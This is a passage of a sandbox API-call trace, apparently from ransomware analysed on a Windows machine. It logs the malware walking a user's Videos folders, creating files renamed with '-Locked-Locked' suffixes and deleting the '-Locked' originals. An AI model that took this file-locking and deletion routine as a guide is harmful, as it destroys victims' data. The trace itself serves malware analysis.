lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\desktop.ini-Locked-Locked", lpFilePart=0x0) returned 0x36 [0307.436] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0307.436] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\desktop.ini-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\desktop.ini-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.437] GetFileType (hFile=0x49c) returned 0x1 [0307.437] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0307.437] GetFileType (hFile=0x49c) returned 0x1 [0307.438] CloseHandle (hObject=0x49c) returned 1 [0307.439] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\desktop.ini-Locked", lpFilePart=0x0) returned 0x2f [0307.439] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\desktop.ini-locked")) returned 1 [0307.440] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\r6h4I4TkF0BMMvPDE.swf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\r6h4I4TkF0BMMvPDE.swf-Locked-Locked", lpFilePart=0x0) returned 0x40 [0307.440] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0307.440] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\r6h4I4TkF0BMMvPDE.swf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\r6h4i4tkf0bmmvpde.swf-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.490] GetFileType (hFile=0x49c) returned 0x1 [0307.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0307.490] GetFileType (hFile=0x49c) returned 0x1 [0307.492] CloseHandle (hObject=0x49c) returned 1 [0307.492] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\r6h4I4TkF0BMMvPDE.swf-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\r6h4I4TkF0BMMvPDE.swf-Locked", lpFilePart=0x0) returned 0x39 [0307.492] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\r6h4I4TkF0BMMvPDE.swf-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\r6h4i4tkf0bmmvpde.swf-locked")) returned 1 [0307.493] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\RLwjRP.avi-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\RLwjRP.avi-Locked-Locked", lpFilePart=0x0) returned 0x35 [0307.493] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0307.493] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\RLwjRP.avi-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\rlwjrp.avi-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.494] GetFileType (hFile=0x49c) returned 0x1 [0307.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0307.494] GetFileType (hFile=0x49c) returned 0x1 [0307.496] CloseHandle (hObject=0x49c) returned 1 [0307.498] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\RLwjRP.avi-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\RLwjRP.avi-Locked", lpFilePart=0x0) returned 0x2e [0307.498] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\RLwjRP.avi-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\rlwjrp.avi-locked")) returned 1 [0307.499] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af188) returned 1 [0307.499] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi", nBufferLength=0x105, lpBuffer=0x1aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi", lpFilePart=0x0) returned 0x2b [0307.499] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\", nBufferLength=0x105, lpBuffer=0x1aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\", lpFilePart=0x0) returned 0x2c [0307.499] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\*", lpFindFileData=0x1aeeb0 | out: lpFindFileData=0x1aeeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x485b6f60, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x35e55110, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35e55110, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.499] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x485b6f60, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x35e55110, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35e55110, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.500] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35cb08b0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35cb08b0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35cb08b0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="avX9IKgh.mp4-Locked", cAlternateFileName="AVX9IK~1.MP4")) returned 1 [0307.500] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d0732d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35d0732d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35d0732d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPERAUjKKYfC9.mkv-Locked", cAlternateFileName="BPERAU~2.MKV")) returned 1 [0307.500] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d2a9e6, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35d2a9e6, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35d2a9e6, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="C9b1z.avi-Locked", cAlternateFileName="C9B1Z~1.AVI")) returned 1 [0307.500] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d7d959, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35d7d959, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35d7d959, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="F sj97dzLd0j5xh.mp4-Locked", cAlternateFileName="FSJ97D~2.MP4")) returned 1 [0307.500] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35e21c69, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35e21c69, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35e21c69, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="qnm0fu5.swf-Locked", cAlternateFileName="QNM0FU~1.SWF")) returned 1 [0307.501] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35e2a55b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35e2a55b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35e2a55b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="syhAMp2P7oE.flv-Locked", cAlternateFileName="SYHAMP~2.FLV")) returned 1 [0307.501] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35e3b681, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35e3b681, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35e3b681, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y2cTfXCEKtMuyCJVAqX.mkv-Locked", cAlternateFileName="Y2CTFX~2.MKV")) returned 1 [0307.501] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0307.501] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af148) returned 1 [0307.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af154) returned 1 [0307.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af188) returned 1 [0307.502] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi", nBufferLength=0x105, lpBuffer=0x1aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi", lpFilePart=0x0) returned 0x2b [0307.502] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\", nBufferLength=0x105, lpBuffer=0x1aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\", lpFilePart=0x0) returned 0x2c [0307.502] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\*", lpFindFileData=0x1aeeb0 | out: lpFindFileData=0x1aeeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x485b6f60, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x35e55110, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35e55110, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.503] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x485b6f60, ftCreationTime.dwHighDateTime=0x1d7e0a0, ftLastAccessTime.dwLowDateTime=0x35e55110, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35e55110, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.503] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35cb08b0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35cb08b0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35cb08b0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="avX9IKgh.mp4-Locked", cAlternateFileName="AVX9IK~1.MP4")) returned 1 [0307.503] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d0732d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35d0732d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35d0732d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bPERAUjKKYfC9.mkv-Locked", cAlternateFileName="BPERAU~2.MKV")) returned 1 [0307.503] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d2a9e6, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35d2a9e6, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35d2a9e6, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="C9b1z.avi-Locked", cAlternateFileName="C9B1Z~1.AVI")) returned 1 [0307.504] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d7d959, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35d7d959, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35d7d959, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="F sj97dzLd0j5xh.mp4-Locked", cAlternateFileName="FSJ97D~2.MP4")) returned 1 [0307.504] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35e21c69, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35e21c69, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35e21c69, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="qnm0fu5.swf-Locked", cAlternateFileName="QNM0FU~1.SWF")) returned 1 [0307.504] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35e2a55b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35e2a55b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35e2a55b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="syhAMp2P7oE.flv-Locked", cAlternateFileName="SYHAMP~2.FLV")) returned 1 [0307.504] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35e3b681, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35e3b681, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35e3b681, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y2cTfXCEKtMuyCJVAqX.mkv-Locked", cAlternateFileName="Y2CTFX~2.MKV")) returned 1 [0307.504] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35e3b681, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35e3b681, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35e3b681, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y2cTfXCEKtMuyCJVAqX.mkv-Locked", cAlternateFileName="Y2CTFX~2.MKV")) returned 0 [0307.505] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af148) returned 1 [0307.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af154) returned 1 [0307.505] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\avX9IKgh.mp4-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\avX9IKgh.mp4-Locked-Locked", lpFilePart=0x0) returned 0x46 [0307.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af034) returned 1 [0307.506] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\avX9IKgh.mp4-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\avx9ikgh.mp4-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.506] GetFileType (hFile=0x49c) returned 0x1 [0307.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af030) returned 1 [0307.506] GetFileType (hFile=0x49c) returned 0x1 [0307.508] CloseHandle (hObject=0x49c) returned 1 [0307.508] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\avX9IKgh.mp4-Locked", nBufferLength=0x105, lpBuffer=0x1aecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\avX9IKgh.mp4-Locked", lpFilePart=0x0) returned 0x3f [0307.508] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\avX9IKgh.mp4-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\avx9ikgh.mp4-locked")) returned 1 [0307.511] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\bPERAUjKKYfC9.mkv-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\bPERAUjKKYfC9.mkv-Locked-Locked", lpFilePart=0x0) returned 0x4b [0307.511] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af034) returned 1 [0307.511] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\bPERAUjKKYfC9.mkv-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\bperaujkkyfc9.mkv-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.512] GetFileType (hFile=0x49c) returned 0x1 [0307.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af030) returned 1 [0307.512] GetFileType (hFile=0x49c) returned 0x1 [0307.513] CloseHandle (hObject=0x49c) returned 1 [0307.513] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\bPERAUjKKYfC9.mkv-Locked", nBufferLength=0x105, lpBuffer=0x1aecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\bPERAUjKKYfC9.mkv-Locked", lpFilePart=0x0) returned 0x44 [0307.514] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\bPERAUjKKYfC9.mkv-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\bperaujkkyfc9.mkv-locked")) returned 1 [0307.514] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\C9b1z.avi-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\C9b1z.avi-Locked-Locked", lpFilePart=0x0) returned 0x43 [0307.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af034) returned 1 [0307.514] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\C9b1z.avi-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\c9b1z.avi-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.514] GetFileType (hFile=0x49c) returned 0x1 [0307.514] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af030) returned 1 [0307.515] GetFileType (hFile=0x49c) returned 0x1 [0307.516] CloseHandle (hObject=0x49c) returned 1 [0307.516] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\C9b1z.avi-Locked", nBufferLength=0x105, lpBuffer=0x1aecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\C9b1z.avi-Locked", lpFilePart=0x0) returned 0x3c [0307.516] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\C9b1z.avi-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\c9b1z.avi-locked")) returned 1 [0307.517] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\F sj97dzLd0j5xh.mp4-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\F sj97dzLd0j5xh.mp4-Locked-Locked", lpFilePart=0x0) returned 0x4d [0307.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af034) returned 1 [0307.559] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\F sj97dzLd0j5xh.mp4-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\f sj97dzld0j5xh.mp4-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.560] GetFileType (hFile=0x49c) returned 0x1 [0307.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af030) returned 1 [0307.560] GetFileType (hFile=0x49c) returned 0x1 [0307.562] CloseHandle (hObject=0x49c) returned 1 [0307.562] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\F sj97dzLd0j5xh.mp4-Locked", nBufferLength=0x105, lpBuffer=0x1aecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\F sj97dzLd0j5xh.mp4-Locked", lpFilePart=0x0) returned 0x46 [0307.562] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\F sj97dzLd0j5xh.mp4-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\f sj97dzld0j5xh.mp4-locked")) returned 1 [0307.563] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\qnm0fu5.swf-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\qnm0fu5.swf-Locked-Locked", lpFilePart=0x0) returned 0x45 [0307.563] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af034) returned 1 [0307.563] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\qnm0fu5.swf-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\1ffeatznfpfdmi\\qnm0fu5.swf-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.563] GetFileType (hFile=0x49c) returned 0x1 [0307.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af030) returned 1 [0307.563] GetFileType (hFile=0x49c) returned 0x1 [0307.565] CloseHandle (hObject=0x49c) returned 1 [0307.565] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\qnm0fu5.swf-Locked", nBufferLength=0x105, lpBuffer=0x1aecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Videos\\1FfeATZnfpFdMi\\qnm0fu5.swf-Locked", lpFilePart=0x0) returned 0x3e [0307.565] DeleteFileW 